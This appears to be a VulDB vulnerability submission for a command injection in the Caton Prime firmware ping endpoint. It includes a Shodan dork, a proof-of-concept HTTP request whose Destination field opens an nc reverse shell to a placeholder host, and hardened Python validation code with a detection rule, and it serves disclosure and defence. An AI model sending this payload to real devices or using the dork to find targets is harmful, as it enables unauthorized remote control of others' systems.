Submit #116760: Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection

Title: Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection

Description:

# Exploit Title: Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version Firmware: 2.1.2.51.e8d7225049(202303031001)
# Shodan Dork: http.favicon.hash:-940032039 title:"Device"

Title:
================
Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection

Summary:
================
A command injection vulnerability found in the Caton Prime product at firmware version 2.1.2.51.e8d7225049(202303031001) could allow an attacker to execute arbitrary commands on the affected system. There are suspicions that this flaw could affect all versions of the product.

The flaw is in the "/cgi-bin/tools_ping.cgi" endpoint, in the "Destination" parameter, which specifies the IP address or hostname to test with the ping functionality. An attacker could exploit this vulnerability by entering a malicious command in the "Destination" parameter, which the system executes without proper validation. This can lead to unauthorized execution of commands on the system, including creating new user accounts, changing file permissions or installing malware.

Severity Level:
================
9.9 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Affected Product:
================
Caton Prime 2.1.2.51.e8d7225049(202303031001)

Proof of Concept:
================
Request:

POST /cgi-bin/tools_ping.cgi?action=Command HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 110
Origin: http://target
Connection: close
Referer: http://target/

{"Interface":"eth0","Count":10,"Destination":"127.0.0.1;nc${IFS}<HOST/IP HERE>${IFS}<IP HERE>${IFS}-e${IFS}/bin/sh"}

Video: https://www.youtube.com/watch?v=H1y7CXjJDmU
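The root cause described in the summary is that the "Destination" value reaches a shell, where ";" and "${IFS}" are interpreted as separators. As an added illustration (not Caton's firmware code; all function names are hypothetical), the following Python shows the vulnerable string-building pattern next to a hardened handler that allowlists the destination as an IP literal or RFC 1123 hostname and runs ping as an argv list without any shell:

```python
import ipaddress
import re
import subprocess

# Hypothetical illustration of the bug class in the advisory, not Caton's code.
# One RFC 1123 hostname label: alphanumerics and hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def vulnerable_ping_command(count: int, destination: str) -> str:
    """What the advisory describes: user input is spliced into a shell string,
    so ';' and ${IFS} are parsed by the shell. Returned here, never executed."""
    return f"ping -c {count} {destination}"


def is_valid_destination(value: str) -> bool:
    """Allowlist check: accept only an IPv4/IPv6 literal or an RFC 1123 hostname.

    Shell metacharacters, ${IFS}, whitespace, and a leading '-' (which ping
    would parse as an option) all fail this check before any command is built.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.fullmatch(label) for label in labels)


def build_ping_argv(interface: str, count: int, destination: str) -> list:
    """Hardened counterpart: validate every field, then return an argv list.

    Raises ValueError on input that fails the allowlist.
    """
    if not is_valid_destination(destination):
        raise ValueError("Destination must be an IP address or hostname")
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,15}", interface):
        raise ValueError("invalid interface name")
    if not 1 <= int(count) <= 20:
        raise ValueError("count out of range")
    return ["ping", "-I", interface, "-c", str(count), destination]


def run_ping(interface: str, count: int, destination: str) -> str:
    argv = build_ping_argv(interface, count, destination)
    # shell=False is the default: each argv element is passed verbatim to execve,
    # so there is no shell to interpret ';' or ${IFS} in the destination.
    return subprocess.run(argv, capture_output=True, text=True, timeout=30).stdout
```

Detection on the wire follows the same rule: a "Destination" field that is not a bare IP literal or hostname (in particular one containing ";" or "${IFS}") is a request worth alerting on.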
User: mrempy (UID 24379)
Submission: 04/21/2023 07:04 (3 years ago)
Moderation: 05/04/2023 17:56 (13 days later)
Status: Accepted
VulDB entry: 228011 [Caton Prime 2.1.2.51.e8d7225049(202303031001) Ping tools_ping.cgi?action=Command Destination command injection]
Points: 17
